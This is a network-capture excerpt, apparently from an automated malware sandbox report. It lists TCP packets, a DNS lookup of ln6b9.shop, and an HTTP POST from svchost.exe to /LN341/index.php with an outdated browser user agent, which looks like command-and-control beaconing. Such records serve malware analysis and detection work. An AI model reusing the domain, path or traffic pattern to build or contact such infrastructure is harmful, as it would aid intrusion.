                                  Aug 29, 2024 23:42:09.702233076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702244043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702253103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702263117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702271938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702327967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702341080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702346087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702352047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702352047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702352047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702387094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702403069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702415943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702425957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702454090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702466965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702491045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702502012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702539921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703006029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703057051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703072071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703082085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703088045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703099012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703111887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703129053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703155041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.703155041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703167915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.703206062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706165075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706185102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706195116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706213951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706245899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706269026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706279993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706290960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706302881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706319094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706345081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706397057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706408978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706419945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706432104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706442118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706470013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706501007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706512928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706528902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706541061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706552982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706564903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706593990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706661940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706674099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706684113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706695080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706707001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706712008 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706718922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706737041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706747055 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706774950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706804037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706820965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706830025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706842899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706854105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706856966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706865072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706876993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.706887007 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706893921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.706926107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707065105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707077026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707087040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707103014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707113028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707114935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707123995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707128048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707138062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707149982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707156897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707161903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707175016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707182884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707201004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707218885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707288027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707299948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707310915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707315922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707321882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707340956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707370043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707442045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707456112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707465887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707479954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707490921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707493067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707501888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707511902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707519054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.707537889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.707560062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709072113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709084034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709094048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709125042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709139109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709182024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709193945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709203959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709216118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709225893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709233046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709256887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709266901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709512949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709523916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709541082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709552050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709559917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709572077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709580898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709583044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709598064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709604025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709609032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709621906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709638119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709645987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709662914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709687948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709703922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709713936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709743977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709744930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709758997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709769011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709791899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709795952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709819078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709842920 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709852934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709866047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709877014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709889889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.709903002 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709929943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.709997892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710007906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710014105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710021019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710031033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710050106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710051060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710059881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710068941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710072041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710082054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710086107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710102081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710108995 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710114956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710125923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710133076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710164070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710222960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710236073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710247040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710261106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710270882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710273027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710294008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710303068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710305929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710319042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.710321903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710345030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.710367918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.790903091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.790923119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.790934086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.790963888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.790988922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791060925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791073084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791083097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791094065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791100025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791110039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791125059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791146994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791250944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791263103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791273117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791282892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791295052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791299105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791306973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791327953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791343927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791598082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791651964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791668892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791680098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791690111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791716099 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791748047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791790009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791801929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791810989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.791837931 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.791863918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.794866085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.794912100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.794918060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.794925928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.794955015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.794969082 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.794997931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795010090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795020103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795032024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795047998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795075893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795206070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795217037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795222044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795227051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795236111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795249939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795264959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795272112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795275927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795289993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795296907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795306921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795314074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795341969 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795424938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795437098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795445919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795488119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795516014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795546055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795557022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795567036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795578003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795589924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795595884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795602083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795608997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795608997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795623064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795634031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795644045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795670033 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795851946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795862913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795872927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795877934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795892000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795903921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795907021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795916080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795922041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795948029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795949936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795959949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795980930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.795984983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.795990944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.796000957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.796011925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.796030045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.796052933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.796066046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.796076059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.796116114 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.796521902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.801657915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.308927059 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.314131021 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.314225912 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.314457893 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.314536095 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319272041 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319325924 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319457054 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319466114 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319480896 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319489956 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319504976 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319509983 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319518089 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319521904 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319535971 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319546938 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319561005 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319586992 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319597006 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.319602966 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319634914 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.319634914 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:10.325326920 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.325336933 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.325346947 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.325356007 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.325402975 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.325412035 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:10.369606018 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:14.381748915 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:14.381818056 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:14.382056952 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:14.382882118 CEST8049731172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:14.382944107 CEST4973180192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:14.386914015 CEST8049731172.67.128.117192.168.2.4

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 29, 2024 23:42:04.256408930 CEST4940553192.168.2.41.1.1.1
                                  Aug 29, 2024 23:42:04.268414974 CEST53494051.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Aug 29, 2024 23:42:04.256408930 CEST192.168.2.41.1.1.10xbfb8Standard query (0)ln6b9.shopA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Aug 29, 2024 23:42:04.268414974 CEST1.1.1.1192.168.2.40xbfb8No error (0)ln6b9.shop172.67.128.117A (IP address)IN (0x0001)false
                                  Aug 29, 2024 23:42:04.268414974 CEST1.1.1.1192.168.2.40xbfb8No error (0)ln6b9.shop104.21.2.6A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • ln6b9.shop

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449730172.67.128.117804940C:\Windows\SysWOW64\svchost.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 29, 2024 23:42:04.280487061 CEST268OUTPOST /LN341/index.php HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
